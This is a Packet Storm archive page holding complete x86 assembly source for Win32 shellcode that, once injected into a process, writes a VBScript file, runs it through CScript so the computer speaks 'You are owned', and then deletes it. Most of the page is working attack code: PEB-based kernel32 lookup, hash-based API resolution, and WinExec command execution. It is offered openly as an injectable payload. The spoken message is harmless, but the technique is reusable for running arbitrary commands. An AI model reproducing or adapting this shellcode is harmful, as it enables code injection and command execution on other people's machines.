exploit the possibilities

Win32 Speaking Shellcode

Win32 Speaking Shellcode
Posted Feb 12, 2012
Authored by Debasish Mandal

Win32 speaking shellcode that says "You are owned!" when injected into a process.

tags | shellcode
systems | windows
MD5 | 99f385bd5fa8d2441dadf37cbc51df9e

Win32 Speaking Shellcode

Change Mirror Download
;Win32 Speaking Shell Code
;Author : Debasish Mandal
;Email : debasishm89 [at] gmail.com
;Blog : http://www.debasish.in/
;Win32 APIs Used: CreateFileA,WriteFile,CloseHandle,WinExec and ExitProcess
;Uses PEB technique to find the base address of kernel32.dll

[SECTION .data]
n db ''
[Section .text]
[BITS 32]
global _start
_start:
jmp start_main
;peb technique
find_kernel32:
xor eax, eax ; clear ebx
mov eax, [fs:0x30] ; get a pointer to the PEB
mov eax, [eax+0x0C] ; get PEB->Ldr
mov eax, [eax+0x14] ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
mov eax, [eax] ; get the next entry (2nd entry)
mov eax, [eax] ; get the next entry (3rd entry)
mov eax, [eax+0x10] ; get the 3rd entries base address (kernel32.dll)
ret
;Function : Find function base address
find_function:
pushad
mov ebp,[esp+0x24]
mov eax,[ebp+0x3c]
mov edx,[ebp+eax+0x78]
add edx,ebp
mov ecx,[edx+0x18]
mov ebx,[edx+0x20]
add ebx,ebp
find_function_loop:
jecxz find_function_finished
dec ecx
mov esi,[ebx+ecx*4]
add esi,ebp
compute_hash:
xor edi,edi
xor eax,eax
cld
compute_hash_again:
lodsb
test al,al
jz compute_hash_finished
ror edi,0xd
add edi,eax
jmp compute_hash_again
compute_hash_finished:
find_function_compare:
cmp edi,[esp+0x28]
jnz find_function_loop
mov ebx,[edx+0x24]
add ebx,ebp
mov cx,[ebx+2*ecx]
mov ebx,[edx+0x1c]
add ebx,ebp
mov eax,[ebx+4*ecx]
add eax,ebp
mov [esp+0x1c],eax
find_function_finished:
popad
ret
find_funcs_for_dll:
lodsd
push eax
push edx
call find_function
mov [edi], eax
add esp,0x08
add edi,0x04
cmp esi,ecx
jne find_funcs_for_dll
find_funcs_for_dll_finished:
ret

GetArgument1: ;temp.vbs
call ArgumentReturn1
db "temp.vbs"
db 0x00
GetArgument2: ;CreateObject("SAPI.SpVoice").Speak"You aare owned"
call ArgumentReturn2
db 'CreateObject("SAPI.SpVoice").Speak"You aare owned"'
db 0x00
GetArgument3: ;CScript.exe //B temp.vbs
call ArgumentReturn3
db "CScript.exe //B temp.vbs"
db 0x00
GetArgument4: ;COMMAND.COM /C DEL temp.vbs
call ArgumentReturn4
db "COMMAND.COM /C DEL temp.vbs"
db 0x00
GetHashes:
call GetHashesReturn
; CreateFileA
db 0xA5
db 0x17
db 0x00
db 0x7C
; WriteFile hash
db 0x1F
db 0x79
db 0x0A
db 0xE8
; CloseHandle hash
db 0xFB
db 0x97
db 0xFD
db 0x0F
;;WinExec hash
db 0x98
db 0xFE
db 0x8A
db 0x0E
;ExitProcess hash
db 0x7E
db 0xD8
db 0xE2
db 0x73
;Main
start_main:
sub esp,0x14 ;allocate space on stack to store 5 function address
mov ebp,esp
call find_kernel32
mov edx,eax ;save base address of kernel32 in edx
jmp GetHashes ;get address of WinExec hash
GetHashesReturn:
pop esi ;get pointer to hash into esi
lea edi, [ebp+0x4] ;we will store the function addresses at edi
mov ecx,esi
add ecx,0x14 ; store address of last hash into ecx
call find_funcs_for_dll ;get function pointers for all hashes
jmp startcalling
startcalling:
;All Done Start calling Win32 APIs
xor eax,eax
xor ebx,ebx ;zero out the registers
xor ecx,ecx ;ECX will always hold 0
;Createfile API
push ecx ; Set Last Parameter to zero
push 0x80 ;FILE_ATTRIBUTE_NORMAL
push 0x2 ;CREATE_ALWAYS
push ecx ;0
push ecx ;0
push 0x2 ;FILE_WRITE_DATA
jmp GetArgument1
ArgumentReturn1:
pop edx ;EDX is now holding the argument temp.vbs
push edx ;Push temp.vbs into stack
call [ebp+4] ;CreateFileA.Kernel32.dll
mov ebx,eax ; store the value of handler to ebx
;writefileapi:
xor ecx,ecx ;Because value of ecx is getting changed after execution of createfile
push ecx ;0
mov eax,n
push eax ;&n
push 0x32 ;Length of the character to write is 50 ~ 0x32
jmp GetArgument2
ArgumentReturn2:
pop edx ;EDX is now holding the argument
push edx
push ebx ; Put the returned buffer into stack.
call [ebp+0x8] ; Writefile.Kernel32.dll
; CloseHandle()
push ebx ; Push the handle buffer into stack
call [ebp+0xC] ; CloseHandle.Kernel32.dll
; Extecute the VBSCRIPT FILE
xor ecx,ecx ; Because value of ecx is getting changed after execution of createfile
push ecx ;0,Force Minimize push zero in stack
jmp GetArgument3 ;ASCII "CScript.exe //B temp.vbs"
ArgumentReturn3:
pop edx
push edx
call [ebp+16] ;WinExec.Kernel32.dll
; Delete the temporary file
xor ecx,ecx ; Because value of ecx is getting changed after execution of createfile
push ecx ;0,Force Minimize push zero in stack
jmp GetArgument4
ArgumentReturn4: ;COMMAND.COM /C DEL temp.vbs
pop edx
push edx
call [ebp+16] ;WinExec.Kernel32.dll
; Exit Process
xor ecx,ecx ; Because value of ecx is getting changed after execution of createfile
push ecx ;0
call [ebp+20] ;ExitProcess.Kernel32.dll

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    31 Files
  • 15
    Feb 15th
    10 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close